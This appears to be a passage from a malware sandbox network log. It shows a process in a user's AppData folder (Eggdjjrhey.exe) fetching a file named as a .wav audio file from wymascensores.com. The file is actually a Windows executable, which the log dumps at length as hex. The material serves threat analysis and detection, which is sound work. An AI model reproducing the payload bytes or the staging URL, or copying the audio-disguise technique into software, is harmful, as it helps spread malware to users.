                                                            2024-09-27 14:01:04 UTC8000INData Raw: 30 30 30 32 30 32 43 30 30 30 30 30 30 35 39 46 45 30 45 30 31 30 30 46 45 30 43 31 41 30 30 32 30 31 30 30 30 30 30 30 30 46 45 30 43 30 31 30 30 39 43 46 45 30 43 31 41 30 30 32 30 31 30 30 30 30 30 30 30 32 30 34 38 30 30 30 30 30 30 32 30 35 30 30 30 30 30 30 30 35 38 39 43 46 45 30 43 31 41 30 30 32 30 31 31 30 30 30 30 30 30 32 30 42 42 30 30 30 30 30 30 32 30 33 45 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 41 30 30 32 30 31 31 30 30 30 30 30 30 32 30 45 31 30 30 30 30 30 30 32 30 34 42 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 41 30 30 32 30 31 31 30 30 30 30 30 30 32 30 37 34 30 30 30 30 30 30 32 30 34 36 30 30 30 30 30 30 35 38 39 43 32 30 44 43 30 30 30 30 30 30 32 30 34 39 30 30 30 30 30 30 35 39 46 45 30 45 30 31 30 30 46 45 30 43 31 41
                                                            Data Ascii: 000202C00000059FE0E0100FE0C1A002010000000FE0C01009CFE0C1A00201000000020480000002050000000589CFE0C1A00201100000020BB000000203E000000599CFE0C1A00201100000020E1000000204B000000599CFE0C1A00201100000020740000002046000000589C20DC000000204900000059FE0E0100FE0C1A
                                                            2024-09-27 14:01:04 UTC8000INData Raw: 33 30 30 30 36 33 39 46 34 45 37 46 46 46 46 32 36 32 30 31 35 30 30 30 30 30 30 33 38 45 39 45 37 46 46 46 46 31 31 32 36 33 39 38 31 45 38 46 46 46 46 32 30 30 32 30 30 30 30 30 30 32 38 44 42 30 33 30 30 30 36 33 39 44 33 45 37 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 43 38 45 37 46 46 46 46 30 30 31 31 30 43 31 39 31 37 31 37 37 33 33 33 30 30 30 30 30 41 31 33 32 33 32 30 31 37 30 30 30 30 30 30 33 38 30 34 30 30 30 30 30 30 46 45 30 43 30 33 30 30 34 35 32 44 30 30 30 30 30 30 35 30 30 30 30 30 30 30 44 31 30 32 30 30 30 30 41 39 30 33 30 30 30 30 32 32 30 30 30 30 30 30 33 43 30 33 30 30 30 30 31 34 30 33 30 30 30 30 38 37 30 34 30 30 30 30 42 43 30 33 30 30 30 30 45 45 30 33 30 30 30 30 46 41 30 30 30 30 30 30 46 46 30 32 30 30 30 30
                                                            Data Ascii: 3000639F4E7FFFF26201500000038E9E7FFFF11263981E8FFFF200200000028DB03000639D3E7FFFF26200100000038C8E7FFFF00110C191717733300000A132320170000003804000000FE0C0300452D00000050000000D1020000A9030000220000003C0300001403000087040000BC030000EE030000FA000000FF020000
                                                            2024-09-27 14:01:04 UTC8000INData Raw: 34 30 30 33 34 30 30 30 30 30 30 34 45 30 30 30 30 31 31 32 30 30 32 30 30 30 30 30 30 38 44 31 37 30 30 30 30 30 31 30 41 30 36 32 30 30 30 30 30 30 30 30 30 46 45 30 39 30 30 30 30 41 32 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 39 30 31 30 30 38 43 30 34 30 30 30 30 30 31 41 32 32 30 30 30 30 30 30 30 30 30 30 36 31 34 32 38 42 37 30 34 30 30 30 36 32 36 32 41 31 42 33 30 30 36 30 30 42 45 30 31 30 30 30 30 34 46 30 30 30 30 31 31 37 45 35 39 30 31 30 30 30 34 38 45 33 41 32 39 30 30 30 30 30 30 37 33 34 38 30 31 30 30 30 41 38 30 37 42 30 31 30 30 30 34 37 33 34 39 30 31 30 30 30 41 38 30 36 46 30 31 30 30 30 34 37 45 36 37 30 31 30 30 30 34 37 32 41 39 30 32 30 30 37 30 36 46 46 38 30 30 30 30 30 41 30 32 32 38 37 43 30 33 30 30 30 36 37 45 36 42
                                                            Data Ascii: 400340000004E00001120020000008D170000010A062000000000FE090000A2062001000000FE0901008C04000001A22000000000061428B7040006262A1B300600BE0100004F0000117E590100048E3A29000000734801000A807B010004734901000A806F0100047E6701000472A90200706FF800000A02287C0300067E6B


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.64971567.212.175.162443936C:\Users\user\AppData\Roaming\Eggdjjrhey.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-27 14:01:18 UTC82OUTGET /john/Teoecc.wav HTTP/1.1
                                                            Host: wymascensores.com
                                                            Connection: Keep-Alive
                                                            2024-09-27 14:01:18 UTC211INHTTP/1.1 200 OK
                                                            Date: Fri, 27 Sep 2024 14:01:17 GMT
                                                            Server: Apache
                                                            Last-Modified: Fri, 27 Sep 2024 00:13:08 GMT
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1912832
                                                            Connection: close
                                                            Content-Type: audio/x-wav
                                                            2024-09-27 14:01:18 UTC7981INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                            Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                                            2024-09-27 14:01:18 UTC8000INData Raw: 45 35 44 30 32 30 30 30 34 37 42 39 38 30 32 30 30 30 34 36 31 37 45 43 38 30 32 30 30 30 34 32 38 34 33 30 39 30 30 30 36 32 30 39 43 34 37 37 36 45 38 32 30 39 34 44 37 32 37 39 46 36 31 37 45 35 44 30 32 30 30 30 34 37 42 38 37 30 32 30 30 30 34 36 31 37 45 43 38 30 32 30 30 30 34 32 38 34 33 30 39 30 30 30 36 32 38 31 32 30 30 30 30 32 42 38 30 34 37 30 30 30 30 30 34 32 30 31 45 30 30 30 30 30 30 33 38 44 30 46 38 46 46 46 46 32 30 45 33 35 32 42 39 41 32 32 30 45 36 36 36 32 44 41 38 36 31 37 45 35 44 30 32 30 30 30 34 37 42 36 45 30 32 30 30 30 34 36 31 37 45 43 38 30 32 30 30 30 34 32 38 34 33 30 39 30 30 30 36 32 30 34 32 38 45 31 31 35 42 32 30 33 33 42 43 32 41 37 46 36 31 37 45 35 44 30 32 30 30 30 34 37 42 35 45 30 32 30 30 30 34 36 31 37 45
                                                            Data Ascii: E5D0200047B98020004617EC80200042843090006209C4776E82094D7279F617E5D0200047B87020004617EC80200042843090006281200002B8047000004201E00000038D0F8FFFF20E352B9A220E6662DA8617E5D0200047B6E020004617EC8020004284309000620428E115B2033BC2A7F617E5D0200047B5E020004617E
                                                            2024-09-27 14:01:18 UTC8000INData Raw: 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 33 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 45 30 30 30 30 30 30 30 35 30 30 30 30 30 30 35 37 30 30 30 30 30 30 33 38 32 39 30 30 30 30 30 30 37 45 41 33 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 39 30 30 32 30 30 30 34 33 39 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 37 45 41 34 30 32 30 30 30 34 32 38 42 33 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 36 37 30 32 30 30
                                                            Data Ascii: 0000000002A13300300800000000100001128830300062001000000FE0E00003800000000FE0C000045030000002E000000050000005700000038290000007EA302000428AF08000620000000007E5D0200047B9002000439CCFFFFFF26200000000038C1FFFFFF7EA402000428B308000620020000007E5D0200047B670200
                                                            2024-09-27 14:01:18 UTC8000INData Raw: 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 33 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 46 30 30 30 30 30 30 30 36 30 30 30 30 30 30 30 35 30 30 30 30 30 30 33 38 32 41 30 30 30 30 30 30 32 41 37 45 41 33 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 39 36 30 32 30 30 30 34 33 41 43 42 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 30 46 46 46 46 46 46 37 45 41 34 30 32 30 30 30 34 32 38 42 33 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 33 44 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36
                                                            Data Ascii: 300800000000100001128830300062001000000FE0E00003800000000FE0C000045030000002F0000000600000005000000382A0000002A7EA302000428AF08000620000000007E5D0200047B960200043ACBFFFFFF26200000000038C0FFFFFF7EA402000428B308000620020000007E5D0200047B3D02000439A2FFFFFF26
                                                            2024-09-27 14:01:18 UTC8000INData Raw: 34 32 38 42 33 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 33 44 30 32 30 30 30 34 33 41 43 42 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 30 46 46 46 46 46 46 37 45 41 33 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 31 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 39 39 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30
                                                            Data Ascii: 428B308000620000000007E5D0200047B3D0200043ACBFFFFFF26200000000038C0FFFFFF7EA302000428AF08000620010000007E5D0200047B9902000439A2FFFFFF2620010000003897FFFFFF120000142A000000120000002A000000120000002A000000120000142A000000120000002A000000120000172A0000001200
                                                            2024-09-27 14:01:18 UTC8000INData Raw: 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 34 31 33 34 30 30 30 30 30 32 30 30 30 30 30 30 31 32 30 31 30 30 30 30 39 32 30 30 30 30 30 30 41 34 30 31 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 44 36 30 30 30 30 30 30 35 39 30 31 30 30 30 30 32 46 30 32 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                            Data Ascii: 40004000000000000000000142A1330050004000000000000000000002A0330080004000000000000000000142A41340000020000001201000092000000A40100008B0000000000000002000000D6000000590100002F0200008B000000000000001330040004000000000000000000142A1330050004000000000000000000
                                                            2024-09-27 14:01:18 UTC8000INData Raw: 46 31 46 30 41 31 46 33 41 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 43 31 46 30 46 31 46 33 42 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 42 31 46 30 41 31 46 33 45 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 38 31 46 30 46 31 46 33 46 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 39 31 46 31 35 31 46 34 30 30 36 32 38 36 45 30 33 30 30 30 36 30 39 31 31 30 46 35 38 30 44 31 31
                                                            Data Ascii: F1F0A1F3A06286E030006120511060911041C1F0F1F3B06286E030006120411051106091F0D1F151F3C06286E03000612031104110511061A1C1F3D06286E030006120609110411051F0B1F0A1F3E06286E03000612051106091104181F0F1F3F06286E030006120411051106091F091F151F4006286E03000609110F580D11
                                                            2024-09-27 14:01:18 UTC8000INData Raw: 30 30 30 32 30 32 43 30 30 30 30 30 30 35 39 46 45 30 45 30 31 30 30 46 45 30 43 31 41 30 30 32 30 31 30 30 30 30 30 30 30 46 45 30 43 30 31 30 30 39 43 46 45 30 43 31 41 30 30 32 30 31 30 30 30 30 30 30 30 32 30 34 38 30 30 30 30 30 30 32 30 35 30 30 30 30 30 30 30 35 38 39 43 46 45 30 43 31 41 30 30 32 30 31 31 30 30 30 30 30 30 32 30 42 42 30 30 30 30 30 30 32 30 33 45 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 41 30 30 32 30 31 31 30 30 30 30 30 30 32 30 45 31 30 30 30 30 30 30 32 30 34 42 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 41 30 30 32 30 31 31 30 30 30 30 30 30 32 30 37 34 30 30 30 30 30 30 32 30 34 36 30 30 30 30 30 30 35 38 39 43 32 30 44 43 30 30 30 30 30 30 32 30 34 39 30 30 30 30 30 30 35 39 46 45 30 45 30 31 30 30 46 45 30 43 31 41
                                                            Data Ascii: 000202C00000059FE0E0100FE0C1A002010000000FE0C01009CFE0C1A00201000000020480000002050000000589CFE0C1A00201100000020BB000000203E000000599CFE0C1A00201100000020E1000000204B000000599CFE0C1A00201100000020740000002046000000589C20DC000000204900000059FE0E0100FE0C1A
                                                            2024-09-27 14:01:18 UTC8000INData Raw: 33 30 30 30 36 33 39 46 34 45 37 46 46 46 46 32 36 32 30 31 35 30 30 30 30 30 30 33 38 45 39 45 37 46 46 46 46 31 31 32 36 33 39 38 31 45 38 46 46 46 46 32 30 30 32 30 30 30 30 30 30 32 38 44 42 30 33 30 30 30 36 33 39 44 33 45 37 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 43 38 45 37 46 46 46 46 30 30 31 31 30 43 31 39 31 37 31 37 37 33 33 33 30 30 30 30 30 41 31 33 32 33 32 30 31 37 30 30 30 30 30 30 33 38 30 34 30 30 30 30 30 30 46 45 30 43 30 33 30 30 34 35 32 44 30 30 30 30 30 30 35 30 30 30 30 30 30 30 44 31 30 32 30 30 30 30 41 39 30 33 30 30 30 30 32 32 30 30 30 30 30 30 33 43 30 33 30 30 30 30 31 34 30 33 30 30 30 30 38 37 30 34 30 30 30 30 42 43 30 33 30 30 30 30 45 45 30 33 30 30 30 30 46 41 30 30 30 30 30 30 46 46 30 32 30 30 30 30
                                                            Data Ascii: 3000639F4E7FFFF26201500000038E9E7FFFF11263981E8FFFF200200000028DB03000639D3E7FFFF26200100000038C8E7FFFF00110C191717733300000A132320170000003804000000FE0C0300452D00000050000000D1020000A9030000220000003C0300001403000087040000BC030000EE030000FA000000FF020000
                                                            2024-09-27 14:01:18 UTC8000INData Raw: 34 30 30 33 34 30 30 30 30 30 30 34 45 30 30 30 30 31 31 32 30 30 32 30 30 30 30 30 30 38 44 31 37 30 30 30 30 30 31 30 41 30 36 32 30 30 30 30 30 30 30 30 30 46 45 30 39 30 30 30 30 41 32 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 39 30 31 30 30 38 43 30 34 30 30 30 30 30 31 41 32 32 30 30 30 30 30 30 30 30 30 30 36 31 34 32 38 42 37 30 34 30 30 30 36 32 36 32 41 31 42 33 30 30 36 30 30 42 45 30 31 30 30 30 30 34 46 30 30 30 30 31 31 37 45 35 39 30 31 30 30 30 34 38 45 33 41 32 39 30 30 30 30 30 30 37 33 34 38 30 31 30 30 30 41 38 30 37 42 30 31 30 30 30 34 37 33 34 39 30 31 30 30 30 41 38 30 36 46 30 31 30 30 30 34 37 45 36 37 30 31 30 30 30 34 37 32 41 39 30 32 30 30 37 30 36 46 46 38 30 30 30 30 30 41 30 32 32 38 37 43 30 33 30 30 30 36 37 45 36 42
                                                            Data Ascii: 400340000004E00001120020000008D170000010A062000000000FE090000A2062001000000FE0901008C04000001A22000000000061428B7040006262A1B300600BE0100004F0000117E590100048E3A29000000734801000A807B010004734901000A806F0100047E6701000472A90200706FF800000A02287C0300067E6B


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.64972467.212.175.1624437152C:\Users\user\AppData\Roaming\Eggdjjrhey.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-09-27 14:01:27 UTC82OUTGET /john/Teoecc.wav HTTP/1.1
                                                            Host: wymascensores.com
                                                            Connection: Keep-Alive
                                                            2024-09-27 14:01:27 UTC211INHTTP/1.1 200 OK
                                                            Date: Fri, 27 Sep 2024 14:01:26 GMT
                                                            Server: Apache
                                                            Last-Modified: Fri, 27 Sep 2024 00:13:08 GMT
                                                            Accept-Ranges: bytes
                                                            Content-Length: 1912832
                                                            Connection: close
                                                            Content-Type: audio/x-wav
                                                            2024-09-27 14:01:27 UTC7981INData Raw: 34 44 35 41 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 46 46 46 46 30 30 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 38 30 30 30 30 30 30 30 30 45 31 46 42 41 30 45 30 30 42 34 30 39 43 44 32 31 42 38 30 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 46 36 37 37 32 36 31 36 44 32 30 36 33 36 31 36 45 36 45 36 46 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 45 32 30 36 39 36 45 32 30 34 34 34 46 35 33 32 30 36 44 36 46 36 34 36 35 32 45 30 44 30 44 30 41 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                            Data Ascii: 4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000
                                                            2024-09-27 14:01:27 UTC8000INData Raw: 45 35 44 30 32 30 30 30 34 37 42 39 38 30 32 30 30 30 34 36 31 37 45 43 38 30 32 30 30 30 34 32 38 34 33 30 39 30 30 30 36 32 30 39 43 34 37 37 36 45 38 32 30 39 34 44 37 32 37 39 46 36 31 37 45 35 44 30 32 30 30 30 34 37 42 38 37 30 32 30 30 30 34 36 31 37 45 43 38 30 32 30 30 30 34 32 38 34 33 30 39 30 30 30 36 32 38 31 32 30 30 30 30 32 42 38 30 34 37 30 30 30 30 30 34 32 30 31 45 30 30 30 30 30 30 33 38 44 30 46 38 46 46 46 46 32 30 45 33 35 32 42 39 41 32 32 30 45 36 36 36 32 44 41 38 36 31 37 45 35 44 30 32 30 30 30 34 37 42 36 45 30 32 30 30 30 34 36 31 37 45 43 38 30 32 30 30 30 34 32 38 34 33 30 39 30 30 30 36 32 30 34 32 38 45 31 31 35 42 32 30 33 33 42 43 32 41 37 46 36 31 37 45 35 44 30 32 30 30 30 34 37 42 35 45 30 32 30 30 30 34 36 31 37 45
                                                            Data Ascii: E5D0200047B98020004617EC80200042843090006209C4776E82094D7279F617E5D0200047B87020004617EC80200042843090006281200002B8047000004201E00000038D0F8FFFF20E352B9A220E6662DA8617E5D0200047B6E020004617EC8020004284309000620428E115B2033BC2A7F617E5D0200047B5E020004617E
                                                            2024-09-27 14:01:27 UTC8000INData Raw: 30 30 30 30 30 30 30 30 30 32 41 31 33 33 30 30 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 33 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 45 30 30 30 30 30 30 30 35 30 30 30 30 30 30 35 37 30 30 30 30 30 30 33 38 32 39 30 30 30 30 30 30 37 45 41 33 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 39 30 30 32 30 30 30 34 33 39 43 43 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 31 46 46 46 46 46 46 37 45 41 34 30 32 30 30 30 34 32 38 42 33 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 36 37 30 32 30 30
                                                            Data Ascii: 0000000002A13300300800000000100001128830300062001000000FE0E00003800000000FE0C000045030000002E000000050000005700000038290000007EA302000428AF08000620000000007E5D0200047B9002000439CCFFFFFF26200000000038C1FFFFFF7EA402000428B308000620020000007E5D0200047B670200
                                                            2024-09-27 14:01:27 UTC8000INData Raw: 33 30 30 38 30 30 30 30 30 30 30 30 31 30 30 30 30 31 31 32 38 38 33 30 33 30 30 30 36 32 30 30 31 30 30 30 30 30 30 46 45 30 45 30 30 30 30 33 38 30 30 30 30 30 30 30 30 46 45 30 43 30 30 30 30 34 35 30 33 30 30 30 30 30 30 32 46 30 30 30 30 30 30 30 36 30 30 30 30 30 30 30 35 30 30 30 30 30 30 33 38 32 41 30 30 30 30 30 30 32 41 37 45 41 33 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 39 36 30 32 30 30 30 34 33 41 43 42 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 30 46 46 46 46 46 46 37 45 41 34 30 32 30 30 30 34 32 38 42 33 30 38 30 30 30 36 32 30 30 32 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 33 44 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36
                                                            Data Ascii: 300800000000100001128830300062001000000FE0E00003800000000FE0C000045030000002F0000000600000005000000382A0000002A7EA302000428AF08000620000000007E5D0200047B960200043ACBFFFFFF26200000000038C0FFFFFF7EA402000428B308000620020000007E5D0200047B3D02000439A2FFFFFF26
                                                            2024-09-27 14:01:27 UTC8000INData Raw: 34 32 38 42 33 30 38 30 30 30 36 32 30 30 30 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 33 44 30 32 30 30 30 34 33 41 43 42 46 46 46 46 46 46 32 36 32 30 30 30 30 30 30 30 30 30 33 38 43 30 46 46 46 46 46 46 37 45 41 33 30 32 30 30 30 34 32 38 41 46 30 38 30 30 30 36 32 30 30 31 30 30 30 30 30 30 37 45 35 44 30 32 30 30 30 34 37 42 39 39 30 32 30 30 30 34 33 39 41 32 46 46 46 46 46 46 32 36 32 30 30 31 30 30 30 30 30 30 33 38 39 37 46 46 46 46 46 46 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 34 32 41 30 30 30 30 30 30 31 32 30 30 30 30 30 30 32 41 30 30 30 30 30 30 31 32 30 30 30 30 31 37 32 41 30 30 30 30 30 30 31 32 30 30
                                                            Data Ascii: 428B308000620000000007E5D0200047B3D0200043ACBFFFFFF26200000000038C0FFFFFF7EA302000428AF08000620010000007E5D0200047B9902000439A2FFFFFF2620010000003897FFFFFF120000142A000000120000002A000000120000002A000000120000142A000000120000002A000000120000172A0000001200
                                                            2024-09-27 14:01:27 UTC8000INData Raw: 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 41 30 33 33 30 30 38 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 34 31 33 34 30 30 30 30 30 32 30 30 30 30 30 30 31 32 30 31 30 30 30 30 39 32 30 30 30 30 30 30 41 34 30 31 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 32 30 30 30 30 30 30 44 36 30 30 30 30 30 30 35 39 30 31 30 30 30 30 32 46 30 32 30 30 30 30 38 42 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 33 33 30 30 34 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 34 32 41 31 33 33 30 30 35 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30
                                                            Data Ascii: 40004000000000000000000142A1330050004000000000000000000002A0330080004000000000000000000142A41340000020000001201000092000000A40100008B0000000000000002000000D6000000590100002F0200008B000000000000001330040004000000000000000000142A1330050004000000000000000000
                                                            2024-09-27 14:01:27 UTC8000INData Raw: 46 31 46 30 41 31 46 33 41 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 43 31 46 30 46 31 46 33 42 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 44 31 46 31 35 31 46 33 43 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 33 31 31 30 34 31 31 30 35 31 31 30 36 31 41 31 43 31 46 33 44 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 36 30 39 31 31 30 34 31 31 30 35 31 46 30 42 31 46 30 41 31 46 33 45 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 35 31 31 30 36 30 39 31 31 30 34 31 38 31 46 30 46 31 46 33 46 30 36 32 38 36 45 30 33 30 30 30 36 31 32 30 34 31 31 30 35 31 31 30 36 30 39 31 46 30 39 31 46 31 35 31 46 34 30 30 36 32 38 36 45 30 33 30 30 30 36 30 39 31 31 30 46 35 38 30 44 31 31
                                                            Data Ascii: F1F0A1F3A06286E030006120511060911041C1F0F1F3B06286E030006120411051106091F0D1F151F3C06286E03000612031104110511061A1C1F3D06286E030006120609110411051F0B1F0A1F3E06286E03000612051106091104181F0F1F3F06286E030006120411051106091F091F151F4006286E03000609110F580D11
                                                            2024-09-27 14:01:27 UTC8000INData Raw: 30 30 30 32 30 32 43 30 30 30 30 30 30 35 39 46 45 30 45 30 31 30 30 46 45 30 43 31 41 30 30 32 30 31 30 30 30 30 30 30 30 46 45 30 43 30 31 30 30 39 43 46 45 30 43 31 41 30 30 32 30 31 30 30 30 30 30 30 30 32 30 34 38 30 30 30 30 30 30 32 30 35 30 30 30 30 30 30 30 35 38 39 43 46 45 30 43 31 41 30 30 32 30 31 31 30 30 30 30 30 30 32 30 42 42 30 30 30 30 30 30 32 30 33 45 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 41 30 30 32 30 31 31 30 30 30 30 30 30 32 30 45 31 30 30 30 30 30 30 32 30 34 42 30 30 30 30 30 30 35 39 39 43 46 45 30 43 31 41 30 30 32 30 31 31 30 30 30 30 30 30 32 30 37 34 30 30 30 30 30 30 32 30 34 36 30 30 30 30 30 30 35 38 39 43 32 30 44 43 30 30 30 30 30 30 32 30 34 39 30 30 30 30 30 30 35 39 46 45 30 45 30 31 30 30 46 45 30 43 31 41
                                                            Data Ascii: 000202C00000059FE0E0100FE0C1A002010000000FE0C01009CFE0C1A00201000000020480000002050000000589CFE0C1A00201100000020BB000000203E000000599CFE0C1A00201100000020E1000000204B000000599CFE0C1A00201100000020740000002046000000589C20DC000000204900000059FE0E0100FE0C1A
